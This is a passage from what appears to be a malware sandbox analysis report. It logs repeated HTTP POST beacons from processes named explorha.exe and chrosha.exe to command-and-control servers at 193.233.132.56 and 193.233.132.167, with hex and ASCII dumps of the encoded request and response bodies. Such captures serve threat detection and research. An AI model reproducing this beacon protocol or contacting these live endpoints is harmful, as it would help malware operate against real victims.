174 | 192.168.2.5 | 50013 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:43.323101997 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:43.568595886 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
175 | 192.168.2.5 | 50014 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:43.928541899 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:44.173676014 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
176 | 192.168.2.5 | 50015 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:44.047102928 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:44.288162947 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:44.289083958 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:44.534444094 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
177 | 192.168.2.5 | 50016 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:44.425004959 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:44.675190926 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      178 | 192.168.2.5 | 50017 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:44.889322042 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.129481077 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.131386995 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.375921965 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      179 | 192.168.2.5 | 50018 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.040631056 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.286217928 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      180 | 192.168.2.5 | 50020 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.667098045 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.919879913 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      181 | 192.168.2.5 | 50021 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.736963987 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.975958109 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:45.977617025 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:46.224092960 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      182 | 192.168.2.5 | 50022 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:46.178802967 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:46.431847095 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
183 | 192.168.2.5 | 50023 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:46.586678028 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:46.835067987 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:46.836169958 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:47.088819981 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
184 | 192.168.2.5 | 50024 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:46.786720037 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:47.031111956 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
185 | 192.168.2.5 | 50025 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:47.287935019 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:47.544823885 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
186 | 192.168.2.5 | 50026 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:47.439147949 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:47.683063984 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:47.684029102 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:47.931834936 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
187 | 192.168.2.5 | 50027 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:47.902400970 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
